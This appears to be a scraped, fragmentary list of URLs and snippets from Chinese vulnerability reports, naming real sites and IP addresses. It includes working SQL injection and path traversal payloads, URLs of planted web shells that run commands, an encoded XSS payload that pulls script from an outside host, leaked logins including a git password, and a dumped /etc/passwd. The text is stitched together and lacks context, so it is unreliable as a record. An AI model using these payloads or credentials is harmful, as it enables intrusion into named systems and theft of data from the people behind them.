http://**.**.**.**/ http://**.**.**.**/nsinfo.php?id=76 http://pmr.cfldcn.com/,密码为123456 http://www.tuigirl.com/ http://www.tuigirl.com/ www.tuigirl.com http://**.**.**.**//admin_login/upfile.asp?formname=myform&editname=pic2&uppath=images/upfile&filelx=aspx http://**.**.**.**/yjsy/index.php?g=Admin&m=Public&a=login http://**.**.**.**/FCKeditor/editor/filemanager/connectors/test.html# http://kpi.ecnu.edu.cn/web.aspx http://fzgh.ecnu.edu.cn/admin/login.aspx url-1:http://ggkf.ecnu.edu.cn/admin/adminlogin.aspx url-2:http://www.dljx.ecnu.edu.cn/Manage/default.php url-1:http://teacherforum.ecnu.edu.cn/admin/editor/db/ewebeditor.mdb url-2:http://www.cc.ecnu.edu.cn/Data/data.mdb http://www.cc.ecnu.edu.cn/Admin_Login.asp http://www.bstest.ecnu.edu.cn/teacher_kk.asp?id=396 http://www.edp.ecnu.edu.cn/Data/db.mdb http://www.edp.ecnu.edu.cn/onews.asp?id=276 http://www.hfftx.com/ http://221.203.189.62:8000/Index.aspx http://221.203.189.62:8001/sys/wdfk_fkcz_select.aspx http://**.**.**.**/~music/sc/news.php?pid=63 http://**.**.**.**/~music/sc/news.php?pid=63%27 http://**.**.**.**/~music/sc/news.php?pid=63%20and%201=1 http://**.**.**.**/~music/sc/news.php?pid=63%20and%201=2 pwd:000 http://www.4008107107.com/ http://www.4008107107.com/dingcan2list/searchlist?ram=0.10950957192108035&searchKey=e&supplierid=169188 http://202.85.212.101/wx/ http://202.85.212.101/wx/login!login.do http://**.**.**.**/zwdtSjgl/index.htm http://**.**.**.**/zwdtSjgl/Manual/Manual.jsp?depid=013544664 http://42.159.81.132/ http://42.159.81.132/jmxroot/jspshell.jsp?cmd=whoami http://**.**.**.**:50000 http://**.**.**.**:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/..//WEB-INF/config/swms.properties http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/..//WEB-INF/config/client.properties http://**.**.**.**/login.aspx http://**.**.**.** 
http://bjgold.com.cn/index.action mybatis.org//DTD http://mybatis.org/dtd/mybatis-generator-config_1_0.dtd dbc:mysql://10.10.82.71:3306/mgmt?useUnicode=true&characterEncoding=UTF8 http://www.springframework.org/schema/beans xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:context="http://www.springframework.org/schema/context xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.0.xsd context:annotation-config context:component-scan rmi://127.0.0.1:9988/userService rmi://127.0.0.1:9988/loanService rmi://127.0.0.1:9988/loanInvestorService rmi://127.0.0.1:9988/userInfoService rmi://127.0.0.1:9988/userPicService rmi://127.0.0.1:9988/authenRecordService rmi://127.0.0.1:9988/loanPicService rmi://127.0.0.1:9988/bankCardService rmi://127.0.0.1:9988/ipAddressLocationService rmi://127.0.0.1:9988/loanCommentService rmi://127.0.0.1:9988/loanManageService rmi://127.0.0.1:9988/thirdPartyService rmi://127.0.0.1:9988/innerMailService rmi://127.0.0.1:9988/userNoticeService rmi://127.0.0.1:9988/investorService rmi://127.0.0.1:9988/cashWithdrawService rmi://127.0.0.1:9988/blackListService rmi://127.0.0.1:9988/borrowerService rmi://127.0.0.1:9988/notificationConfigService rmi://127.0.0.1:9988/userSecurityQuestionService rmi://127.0.0.1:9988/creditReportService rmi://127.0.0.1:9988/creditMaterialService rmi://127.0.0.1:9988/creditRightsService rmi://127.0.0.1:9988/loanQuartzService rmi://127.0.0.1:9988/collectionService rmi://127.0.0.1:9988/rechargeLogService rmi://127.0.0.1:9988/loanCollateralService rmi://127.0.0.1:9988/noblemetalService rmi://127.0.0.1:9988/noblemetalRecordService rmi://127.0.0.1:9988/soldBackService rmi://127.0.0.1:9988/extractionService rmi://127.0.0.1:9988/noblemetalInfoService rmi://127.0.0.1:9988/nobleCustodyService rmi://127.0.0.1:9988/SigningNoblemetalService 
rmi://127.0.0.1:9988/channelService rmi://127.0.0.1:9988/goldCardService rmi://127.0.0.1:9988/buyGoldService rmi://127.0.0.1:9988/tradeFlowService rmi://127.0.0.1:9988/returnGoldService rmi://127.0.0.1:9988/custodyService http://192.168.1.120:8080/jforum http://58.68.224.22:8080/public/fromUrl.session.action http://58.68.224.22:8080/public/backUrl.action http://58.68.224.22:8080/public/usercenterControl.session.action http://58.68.224.22:8080/public/usercenterControl.session.action http://**.**.**.**/oa/login.do?action=login http://**.**.**.**/oa/app_resource/form/image/Img486105403.jsp http://210.21.236.163/Users/LoginPage.html http://kr.haidilao.com http://kr.haidilao.com/index.php/Dishes/feature/id/101 http://track.3songshu.com/app.zip http://**.**.**.**/asp/xinsheng/xyxsheng.asp http://**.**.**.**/login.jsp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/about_us.php?Key=7 http://**.**.**.**/article.php?id=818717 http://**.**.**.**:20000/hebwspt/ http://bbs.haidilao.com/portal.php?mod=list&catid=1 user:admin pass:123456 http://bbs.haidilao.com/data/dzapp_haodai_config.php http://www.cninsure.net http://www.cninsure.net/help.aspx Url:http://121.201.34.104/admin/login.php http://jw.sthu.edu.cn/上海师范大学天华学院 http://**.**.**.**/loginm.shtml?option=getMsgBack&subOption=m&getMsgBack=1&identifyCode=1 https://**.**.**.**/loginm.shtml?option=getMsgBack&subOption=m&getMsgBack=1&identifyCode http://**.**.**.**/policy.shtml?option=getCity&province= url:http://www.zhen.com/ http://**.**.**.**/ user:zhangling pwd:000000 http://www.ccib.com.cn/CHN/About/newsShow.asp?news_id=428 http://zhaopin.baidu.com/?query=%3C/script%3E%3Cscript%3Ealert%28%22%22%29%3C/script%3E%27 http://www.topxia.com http://www.topxia.com/.git/config http://**.**.**.**/productsDia.php?d=1 http://**.**.**.**/productsDia.php?d=1 http://**.**.**.**/bugs/wooyun-2015-0140285 http://learning.ufh.com.cn/CVS/Root http://learning.ufh.com.cn/CVS/Entries http://em.ele.me/ test:test弱口令进去之后 
www.oxiranchem.com/gufen/jishu.php?form_id=226&bigkind=04&kind=0403 http://**.**.**.**/account/Installshow.aspx?id=68 http://**.**.**.**/account/Installshow.aspx?id=12177266 http://**.**.**.**/account/Installshow.aspx?id=14087416 http://**.**.**.**/account/maintenanceshow.aspx?id=1203 http://**.**.**.**/account/maintenanceshow.aspx?id=5562451 http://**.**.**.**/account/maintenanceshow.aspx?id=7163769 http://www.oilpl.com:81/card_link/index.action http://bm.huatu.com/plus/ http://**.**.**.**:7776/mes/viewCustomer.action?id=26571012 http://**.**.**.**:7776/mes/viewCustomer.action?id=26571013 http://srm.fiberhome.com.cn/srm/Login.aspx http://srm.fiberhome.com.cn/srm/upload.aspx http://srm.fiberhome.com.cn/srm/upload/20151220/201512200501496718.asp http://118.144.75.72/invoker/JMXInvokerServlet http://118.144.75.72/is/index.jsp http://www.ifeng.com/ http://www.qhxjcy.gov.cn/admin/ http://www.qhxjcy.gov.cn/index.asp http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://oa.baison.com.cn http://oa.baison.com.cn//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://oa.baison.com.cn//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://123.57.10.156 http://**.**.**.**:80/ http://**.**.**.**:7001/defaultroot/login.jsp http://218.26.176.181:8082/yyoa/checkWaitdo.jsp?userID=1 http://hiface.haidilao.com:9990/hdlSNS/hdlsns/newPhoto.action?userId=12939124 http://oa.gykgnmg.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://oa.gykgnmg.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database%28%29 
http://**.**.**.**:7776/mes/viewCustomer.action?id=26571013 http://**.**.**.**:7776/mes/1.jsp?i=ls encap:Ethernet fe9a:4d/64 Scope:Link MTU:1500 packets:863515695 packets:135263890 txqueuelen:1000 http://agent.cctvmall.cn/mall/login.html http://**.**.**.**/website/home.do idolbm.dragontv.cn/select.php?uuid=001901 http://**.**.**.**/ http://**.**.**.**/manager/news/more/more_1.asp?disp_id=322 http://**.**.**.**/manager/news/more/more_1.asp?disp_id=322 http://**.**.**.**/manager/news/more/more_1.asp?disp_id=322 http://**.**.**.**//jjproduct/jjProductSercher.htm?orderstr=update_date%20desc http://**.**.**.**//oa/admin/application/file_download.jsp?filePath=c:\windows\system.ini http://**.**.**.**/wlsh/glink/show.php?ID=5 http://**.**.**.**/spc/ http://202.85.212.104/SDMS/login!login.do https://leishen:Haier0806@git.coding.net/leishen/web.git leishen:Haier0806 http://store.leishen.cn/ http://**.**.**.** http://**.**.**.**/index.php?city_id=304 http://**.**.**.**/knowledge/indexs.aspx"--data="id=55 http://sinopectech.com http://sinopectech.com/s.rar http://**.**.**.**/ http://m.v.qq.com/search.html?searchSession=&act=0&keyWord=aa\74\151\155\147\40\163\162\143\75\170\40\157\156\145\162\162\157\162\75\163\75\143\162\145\141\164\145\105\154\145\155\145\156\164\50\47\163\143\162\151\160\164\47\51\73\142\157\144\171\56\141\160\160\145\156\144\103\150\151\154\144\50\163\51\73\163\56\163\162\143\75\47\150\164\164\160\72\57\57\144\167\172\56\143\156\57\62\157\150\130\106\60\47\73\76 http://218.26.176.181/(国药山西的主站)的9090端口是jboss,检测发现存在最新的java反序列化漏洞。 http://218.26.176.181:9090/ http://mindiao.cjn.cn/guest_more.php?boardid=81 http://mindiao.cjn.cn/guest_more.php?boardid=81 http://**.**.**.**/backoffice/main1.aspx?type=fore http://**.**.**.** root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync 
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin weblogic:x:700:700::/app:/bin/bash patrol:x:501:501::/app/patrol:/bin/bash http://210.77.177.13:8000/sgcis/ encap:Ethernet A9:4F:BF addr:10.2.150.134 Bcast:10.2.150.191 Mask:255.255.255.192 MTU:1500 packets:4048849086 packets:3822598125 txqueuelen:1000 
http://115.182.9.109/console http://115.182.9.109/ca/ma3.jsp http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://xxx/downurl.phpurls=datauploadfile/1/1450631688.php&filename=hhh.php http://xxx/data/uploadfile/1/1450631688.php http://demo.phpoa.cn/data/uploadfile/2/1450632097.php http://**.**.**.**/ http://**.**.**.**/ http://news.sicnu.edu.cn/?ctl=login http://weixin.glodon.com/.svn/entries http://minsheng.cn/logon/admin_logon.jsp http://220.181.168.69:7001/ http://www.qljr.com/commentlist?page=1&newid=611813 http://special.xincheping.com/w-/OjhSztmN*.html http://**.**.**.**/joomla/ http://**.**.**.**/joomla/wuyun.php http://**.**.**.**/ http://learning.ufh.com.cn/CVS/Entries http://learning.ufh.com.cn/adm/CVS/Entries http://**.**.**.**/video.php?nid=1 http://**.**.**.**:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://**.**.**.**:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://**.**.**.**:7001/wscx/ http://**.**.**.**/**.**.**.**.rar http://m.100tal.com/Home/Index/wlzxwz_note?star_article_id=1 http://**.**.**.**/ https://**.**.**.**/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor http://www.cjkd.com.cn http://www.cjkd.com.cn/admin/login http://**.**.**.**/Info.asp?ArticleID=2950 http://**.**.**.**/webpac/search.cfm http://**.**.**.**/代码执行,可getshell http://oa.mis.hexun.com/feedback/fb/viewFbResult.action?id=40480 http://202.121.32.191/TeachingCenter/login.html http://211.147.252.237:8080/flxt/ http://211.147.252.237:8080/mdass/ http://211.147.252.237:8080/racs/ http://211.147.252.237:8080/jbossws13/ http://211.147.91.45/SignOnServlet http://**.**.**.**/admin/default.php http://**.**.**.**/ http://**.**.**.**/control/ajax/getcity.aspx?pid=1 http://wechat.bestv.com.cn/search/ http://**.**.**.**/ http://oa.feihe.com/seeyon/index.jsp http://drops.wooyun.org/papers/598 http://www.leishen.cn/.git/config https://git.coding.net/leishen/web.git 
http://www.leishen.cn/phpinfo.php http://m.leishen.cn/show.php?id=32&cid=18 http://m.leishen.cn/listshow.php?id=22&cid=6 http://**.**.**.**/ http://218.17.215.54:8080/StorageModel/login.jsp http://218.97.254.84:8080/UUMC/ ACC--http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/gsjj.htm http://**.**.**.**/ http://**.**.**.**/gsjj.php http://**.**.**.**/ http://**.**.**.**/qyjj.php http://**.**.**.**/gsjj.php http://**.**.**.**/main/xwzx.aspx?nid=168 http://**.**.**.**/index.php http://**.**.**.**/index.php http://www.mafengwo.cn/together/ http://www.hahapinche.com/News/news_detail?id=660 http://**.**.**.**/?id=/* http://**.**.**.**/bugs/wooyun-2015-0163141 http://**.**.**.**/?id=/* http://haosy.glodon.com:80/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/content/24531 http://**.**.**.**/bugs/wooyun-2015-0163155/trace/790d482c016ae9fa3f23903dc67be586 http://**.**.**.**/phpmyadmin2/ http://birdpush.com/admin/login.action http://www.haoshouwang.com/phone?brand=21 index.php/search/*/1.html www.qhwealth.com http://www.qhwealth.com http://**.**.**.**:80/fund/FundPerformance/fundGetChart.do https://**.**.**.**/Sogeiliable/qd- http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/gzStat1/chaxunAction.do?method=queryZb http://**.**.**.**/gzStat1/chaxunAction.do?method=queryZb cn:7001存在weblogic。而且该版本还存在java反序列化命令执行漏洞 http://**.**.**.**/Search.aspx?search=11 http://**.**.**.**/index.jsp http://**.**.**.**//Chart/GoldChart.aspx?ChartDirectorChartImage=chart_fxChart&cacheId=c:\windows\win.ini&cacheDefeat=635863155579382345 http://**.**.**.**/phpmyadmin/ http://**.**.**.**/gouwulist.aspx?Id=16&IsTel=1&httpUrl= http://**.**.**.**/alipayto.aspx?trade_no=2015061544046&SPID= http://**.**.**.**/gouwulist.aspx?Id=16&IsTel=1&httpUrl= http://**.**.**.**/index.jsp http://cms.php.administrator.cctvmall.com/ http://**.**.**.**/index.jsp http://123.124.19.86 http://**.**.**.**/index.jsp usernmae:xxxx@163.com password:string+number 
http://www.safedog.cn/?id=%20--%20%27%20union%20select%201,2%20from%20users%23 http://humancapital.cufe.edu.cn/admin.php Settings.asmx/AnswerTo http://101.231.75.117/defaultroot/login.jsp http://www.haoshouwang.com/login/forget_password http://www.cninsure.net/touzizhe/shop/member!queryfujian.action?id=264004 http://**.**.**.**:6080/ http://www.yichemall.com www.yichemall.com http://oa.bjgold.com.cn/ http://113.78.134.110:81/login.do http://ylx.mis.hexun.com:81/feedback/fb/viewFbResult.action?id=40480 http://**.**.**.**/ccbs/ccbs/order/showOrderList.do?method=showOrderDetailJsp&orderId=282728&random=2 http://**.**.**.**/ccbs/ccbs/order/pji_orderinfo.jsp?orderId=282728 http://**.**.**.**/ccbs/ccbs/order/showOrder.do?method=showOrderEditCustomerJsp_newOrder&partyId=286987&callPhone=123&edit=false&uniqueid=713.7934794644451&dataSourceId=99&isTest=N http://**.**.**.**/ccbs/ccbs/order/showOrder.do?method=showOrderEditMainJsp&callPhone=123&agentId=2&ccbsUserName=AGENT1&uniqueid=713.7934794644451&dataSourceId=99&temp=Y# http://**.**.**.**/ccbs/ccbs/customer/showCustomer.do?method=queryCustomerAddressEditJsp&partyId=286987&contactMechId=465324&productStoreName=%E5%8C%97%E4%BA%AC%E9%87%91%E8%9E%8D%E8%A1%97%E5%BA%97&productStoreId=100009&random=1450698218897 http://**.**.**.**/ccbs/ccbs/store/showProductStore.do?method=showUserAddressCheckJsp&serviceAddress=&startCode=&endCode=&cityId=50003 http://www.gykgah.com/yyoa/ http://www.gykgah.com/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**/file_title.php?weblan=g&in_title_id=123 http://**.**.**.**/file_title.php?weblan=g&in_title_id=123 http://**.**.**.**/invite/bulletin/list.aspx http://**.**.**.**:80/ http://www.chinanetwork.com.cn/w8/Comment/GetUserCommits?pid=-1 http://zhishangjianzhu.blog.sohu.com/a/app/discuss/save.htm?_input_encode=UTF-8 http://**.**.**.**/ http://**.**.**.**/index.php?m=2&s=16 http://**.**.**.** http://**.**.**.**/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER 
http://ticketapi.video.qq.com/get_bonus?otype=json&callback=jQuery19102120662210509181_1450691532464&low_login=1&c_id=1&ucode=asd&c_from=1&g_tk=932252050&_=1450691532477 http://121.201.104.80:8000/webpy/index#ace/daydaykk/editlabel.html http://218.26.176.181:8082/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/jyztbmis_hb/memberLogin.jspx http://www.csairshop.com:80/category.php?brand=78&filter=0&id=683&price_max=0&price_min=0 http://www.csairshop.com:80/category.php?brand=78&filter=0&id=683&price_max=0&price_min=0 http://kr.haidilao.com http://kr.haidilao.com/index.php/About/load http://dk.qk365.com/ http://www.baoxian.com/upload/ http://**.**.**.**/manager/html http://www.4008107107.com/DingCan2List/SearchList?supplierid=169188&searchKey=%E5%95%8A&ram=0.8239255126100034 http://mgtp.suning.com/server-status https://smile.wanda.cn/mobile/index/login http://**.**.**.**:9020/Login.aspx http://**.**.**.**:9020 http://**.**.**.**/news_1.php?id=1741 server:/usr/java/jdk1.6.0_45/jre/lib/amd64:/usr/java/jdk1.6.0_45/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib http://**.**.**.**/ http://115.182.9.109/ http://**.**.**.**/news/article.php?cid=4&id=3764 http://m.ikang.com/index.html#login http://www.gzsz.com.cn:888/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=%2817%29%20union%20all%20select%20user%28%29%23 http://www.gzsz.com.cn:888/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=%2817%29%20union%20all%20select%201,2,@@version,user%28%29%23 http://www.gzsz.com.cn:888/yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=%281%29%20and%201=2%20union%20select%20concat%280x23,user%28%29,0x23,@@version%29%20--%20- http://redmine.keruyun.com/ https://124.127.49.209/ https://124.127.49.210/ https://124.127.49.211/ https://124.127.49.212/ https://124.127.49.213/ https://124.127.49.214/ http://starvalley.starv.tv admin:123456可登陆,同时,登陆的post表单可以sql注入 http://crm.iresearch.com.cn/login.aspx http://58.251.18.196/ 
http://58.251.18.196:9002/console/login/LoginForm.jsp http://58.251.18.196:9002/jmxroot/jmxroot.jsp http://124.65.122.154:8080/krt http://124.65.122.154:8080/jmx-console/ http://211.152.45.200/ http://caipiao.gooooal.com/ http://www.gooooal.com/ http://163.gooooal.com/ http://sns.gf.com.cn/km/rs/roadshow.sp bbs.360che.com/m/viewthread.php?tid=549765&extra=page=2&orderby=dateline http://**.**.**.**/ http://www.datuodui.com http://www.datuodui.com/wa/wa/ma3.jsp http://118.144.75.72/platform/framework/global/login.jsp http://118.144.75.72/platform/framework/global/down.jsp http://118.144.75.72/platform/framework/global/down.jsp?link=/WEB-INF/web.xml http://**.**.**.**/pub/tjwcb/index.html http://ip/cgi-bin/ExportSettings.sh的时候,就可以下载config.dat文件,ExportSettings的文件内容如下: user:admin'or'1'='1 pwd:123456 http://www.cninsure.net/touzizhe/shop/member!queryfujiansize.action?id=1 http://**.**.**.**/cn/index.php?pid=1 http://221.133.244.60/ http://**.**.**.** https://tuan.9fbank.com/ http://io.glodon.com/login/login.do http://**.**.**.**/cas/login http://mail.faw.com.cn/ http://**.**.**.**/wa/wa/ma3.jsp http://**.**.**.**/NewsInfo.asp?id=173 http://**.**.**.**/portal/portal!index.action存在命令执行漏洞 http://**.**.**.**/bak.jsp密码test http://20151112.m.ceshi.xin.com/.svn/ http://**.**.**.**/console http://**.**.**.**/app/app1.jsp http://extplat.minanins.com:9002/console/login/LoginForm.jsp http://extplat.minanins.com:9002/jmxroot/jmxroot.jsp http://www.gf.com.cn/commons/showDocumentFile.jsp?id=105471 http://**.**.**.**/webcore/webcont!Cont.action http://cms.php.administrator.cctvmall.com/index.php?r=user/login http://202.96.11.18 http://**.**.**.**/ https://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 https://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 
url:http://223.203.132.38/ http://**.**.**.**/admin/ http://**.**.**.**/wd2/main.do?author=WT6486 http://**.**.**.**/ http://106.37.195.143/clppay/jsp/login/login.jsp http://106.37.195.143 http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/car/help.jsp http://**.**.**.**/newsDetail.action http://**.**.**.**/bak.jsp http://122.226.67.42:8080/ http://app.bbs.360che.com/newviewthreadapp1.php?tid=750198&uid=359052&oauth=c829LDUicmOwJLu3/qxu8QpmwvUl555toKrT6lyXdHwt%204PdFRL3oQf87d4tOXuk8xK9#gone http://**.**.**.**:88/school/login.jsp site:tbbs.glodon.com http://tbbs.glodon.com/forum.php?mod=viewthread&tid=1049 http://tbbs.glodon.com/forum.php?mod=viewthread&tid=1396 http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/site_item_content_2.php?site_map_item_id=310 http://**.**.**.**/SmartKMS/LoginPage.action http://wxy.szu.edu.cn/Info.aspx?pc=about存在比较严重的sql注入漏洞 kali:/tmp# kali:/tmp# http://121.42.192.152:8080/ http://121.42.192.152:8080/web-console http://121.42.192.152:8080/jbossass/jbossass.jsp patrol.zznissan.com.cn/news/news-mb.php?id=168 http://**.**.**.**/index.jsp http://**.**.**.**/,图中标识链接存在命令执行漏洞 http://**.**.**.**/ggkb/lyb/detail.asp?wordid=2 http://**.**.**.**/view.asp?InfoID=8888 http://www.ifuzhuang.com/ http://222.73.113.49/site/login http://202.96.11.73 http://202.96.11.73/names.nsf/$users?OpenView&Start=1&count=200 http://app.360che.com/android.html http://**.**.**.**/logon.jsp http://506srm.cofco.com/FileDownLoad.aspx?fileid=20981 http://506srm.cofco.com/FileDownLoad.aspx?fileid=20980 http://bbs.360che.com/memcp.php?items=shipaddress&action=newprofile&typeid=5&addid=8583&operation=update#addradd http://bbs.360che.com/memcp.php?items=shipaddress&action=newprofile&typeid=5&addid=8583&operation=update#addradd http://bbs.360che.com/memcp.php?items=shipaddress&action=newprofile&typeid=5&addid=8511&operation=update#addradd http://bbs.360che.com/memcp.php?items=shipaddress&action=newprofile&typeid=5&addid=8511&operation=update#addradd 
http://**.**.**.**//manage/upload/upload.html http://test.fh21.com.cn/index.php?a=countNum&aa=1&c=index&m=zzzc http://**.**.**.**/Web/HotelMain.aspx?content=HotelDetail&id=27922EA0-53EF-40E2-A832-92ACE1F59681 http://**.**.**.**/ntutcsl/news_info.php?id=38 http://**.**.**.**/findpwd.aspx http://**.**.**.**/handlers/findpwdservice.ashx?cmd=ChangePwdForFind http://**.**.**.**/handlers/addressservice.ashx?callback=myFunc&cmd=GetAddressByID&r=0.522482806749804 http://mai.360che.com/flow.php?step=xiu_add http://fair.st.octmami.com/admin.php?r=order/default/index http://60.28.104.133:9060//yyoa/assess/js/initDataAssess.jsp http://60.28.104.133:9060/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://60.28.104.133:9060//yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids= http://60.28.104.133:9060/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.cctvstock.com/ http://club.cctvstock.com/tools/json/LoginPlus.aspx?action=login&callback=jsonp1450765749548&u=admin&p=admin http://**.**.**.**:82/superadmin/adminLogin.action http://**.**.**.**/news.php?sid=1 http://cfms.sdu.edu.cn/.git/config http://**.**.**.**/=**.**.**.**存在命令执行 http://www.dongfeng-nissan.com.cn/zh-CN/dealer/nissan/jiangxi/nanchang/nchcheng/quote.aspx?s=teana http://222.76.217.175/ http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/car/test.jsp http://114.141.132.254/level/15/exec/- http://test.ipcc-rise.com/ http://test.ipcc-rise.com/pay/order.php http://tcmages.com:8080/jmx-console/ http://sadmin.haoshouwang.com/youorder/minute/id/645/state/55 view-source:http://sadmin.haoshouwang.com/login/index http://mrtg.yxdown.com/ http://hk5.midea.com http://haiwai.anjuke.com http://haiwai.anjuke.com/list/s?g=6 http://g.fh21.com.cn http://kfcloud.dper.com/index.jsp http://xczx.swufe.edu.cn/ems/exam/sse/ks_card_print_all.jsp?ks_pc_bm= http://hiho.swufe.edu.cn/videos?top=14 http://**.**.**.**/admin index.php/fortune/searchMember 
https://m.hongkongairlines.com/html/fortune/card_signOut.html http://**.**.**.**/ http://www.scrcoa.com/ http://www.scrcoa.com/yyoa/checkWaitdo.jsp?userID=1 http://www.scrcoa.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:8081/m1/login.do http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/messager/users.data http://m.lanfw.com/city.php?city_id=bj http://www.cytobacco.com/WEB/admin/website/magazine/manageMagazine.jsp http://**.**.**.**/ttco/notice_list?notice.productState=0 http://**.**.**.**/ttco/netWorthShow?product.id=7E0501916C8C43FF855A114427EB2BFA https://admin.jiashuangkuaizi.com/Public/login/ https://admin.jiashuangkuaizi.com/Public/login/ www.xinnet.com http://www.xinnet.com http://oa.yhfund.com.cn:8070/ http://**.**.**.**:80/Article/FavorableDeatils.aspx?id=96 http://xp.glodon.com/ http://gfm.glodon.com/jmx-console/ http://gfm.glodon.com//invoker/JMXInvokerServlet http://oa.gykgnmg.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://oa.gykgnmg.com/yyoa/checkWaitdo.jsp?userID=1 http://27.223.70.77:7001/ http://xmlns.oracle.com/weblogic/domain xmlns:sec="http://xmlns.oracle.com/weblogic/security xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider 